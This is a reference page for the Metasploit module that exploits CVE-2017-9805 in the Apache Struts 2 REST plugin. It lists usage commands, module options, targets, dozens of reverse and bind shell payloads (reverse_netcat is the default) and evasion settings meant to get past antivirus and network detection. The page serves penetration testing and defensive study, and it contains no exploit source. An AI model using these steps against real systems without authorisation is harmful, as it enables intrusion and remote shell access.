Apache Struts 2 REST Plugin XStream RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/struts2_rest_xstream metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apache Struts 2 REST Plugin XStream RCE
Module: exploit/multi/http/struts2_rest_xstream
Source code: modules/exploits/multi/http/struts2_rest_xstream.rb
Disclosure date: 2017-09-05
Last modification time: 2019-07-10 10:58:03 +0000
Supported architecture(s): cmd, python, x86, x64
Supported platform(s): Linux, Python, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-9805

Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, using the REST plugin, are vulnerable to a Java deserialization attack in the XStream library.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/http/struts2_rest_xstream
msf exploit(struts2_rest_xstream) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


struts2_rest_xstream is a module that exploits Apache Struts 2's REST plugin, using the XStream handler to deserialise XML requests perform arbitrary code execution.

Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12

You can download these versions here with any version of Apache Tomcat:

http://archive.apache.org/dist/struts/

You will also need to install a Struts 2 showcase application, which can be found here:

https://mvnrepository.com/artifact/org.apache.struts/struts2-rest-showcase

Options


TARGETURI

The path to a struts application action

VHOST

The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.

Scenarios


The Check Command

The struts2_rest_xstream module comes with a check command that can effectively check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following:

set VERBOSE true
set RHOST [IP]
set TARGETURI [path to the Struts app with an action]

When the module is in verbose mode, the check command will try to tell you the OS information, and whether or not the machine is vulnerable. Like this:

msf exploit(struts2_rest_xstream) > check

[+] 10.1.11.11:8080 The target appears to be vulnerable.

Exploiting the Host

After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS.

Go back to menu.

Msfconsole Usage


Here is how the multi/http/struts2_rest_xstream exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/struts2_rest_xstream

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_rest_xstream) > show info

       Name: Apache Struts 2 REST Plugin XStream RCE
     Module: exploit/multi/http/struts2_rest_xstream
   Platform: Unix, Python, Linux, Windows
       Arch: cmd, python, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-09-05

Provided by:
  Man Yue Mo
  wvu <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Unix (In-Memory)
  1   Windows (In-Memory)
  2   Python (In-Memory)
  3   PowerShell (In-Memory)
  4   Linux (Dropper)
  5   Windows (Dropper)

Check supported:
  Yes

Basic options:
  Name       Current Setting                  Required  Description
  ----       ---------------                  --------  -----------
  Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080                             yes       The target port (TCP)
  SRVHOST    0.0.0.0                          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080                             yes       The local port to listen on.
  SSL        false                            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts action
  URIPATH                                     no        The URI to use for this exploit (default is random)
  VHOST                                       no        HTTP server virtual host

Payload information:

Description:
  Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 
  2.5.12, using the REST plugin, are vulnerable to a Java 
  deserialization attack in the XStream library.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-9805
  https://struts.apache.org/docs/s2-052.html
  https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
  https://github.com/mbechler/marshalsec

Module Options


This is a complete list of options available in the multi/http/struts2_rest_xstream exploit:

msf6 exploit(multi/http/struts2_rest_xstream) > show options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts action
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

Advanced Options


Here is a complete list of advanced options supported by the multi/http/struts2_rest_xstream exploit:

msf6 exploit(multi/http/struts2_rest_xstream) > show advanced

Module advanced options (exploit/multi/http/struts2_rest_xstream):

   Name                                    Current Setting                                     Required  Description
   ----                                    ---------------                                     --------  -----------
   CMDSTAGER::DECODER                                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR                       auto                                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, l
                                                                                                         wprequest, psh_invokewebrequest)
   CMDSTAGER::SSL                          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                                             no        Writable directory for staged files
   ContextInformationFile                                                                      no        The information file that contains context information
   DOMAIN                                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS                           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler                   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR                              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack                           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject                             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod                          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                                               no        The executable template file name.
   EnableContextEncoding                   false                                               no        Use transient context when encoding payloads
   FingerprintCheck                        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors                         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly                    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR                              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                                               no        The msi template file name
   MSI::UAC                                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   Powershell::encode_final_payload        false                                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                               yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                          yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                yes       Execute powershell without interaction
   Powershell::persist                     false                                               yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true                                                yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                                                   no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                               yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                yes       Strip comments
   Powershell::strip_whitespace            false                                               yes       Strip whitespace
   Powershell::sub_funcs                   false                                               yes       Substitute function names
   Powershell::sub_vars                    true                                                yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                yes       Wraps the -Command argument in single quotes
   SSLCipher                                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression                          false                                               no        Enable SSL/TLS-level compression
   SSLVersion                              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2
                                                                                                         )
   SendRobots                              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent                               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module
   WfsDelay                                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/struts2_rest_xstream module can exploit:

msf6 exploit(multi/http/struts2_rest_xstream) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix (In-Memory)
   1   Windows (In-Memory)
   2   Python (In-Memory)
   3   PowerShell (In-Memory)
   4   Linux (Dropper)
   5   Windows (Dropper)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/struts2_rest_xstream exploit:

msf6 exploit(multi/http/struts2_rest_xstream) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/struts2_rest_xstream exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/struts2_rest_xstream) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Man Yue Mo
  • wvu

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.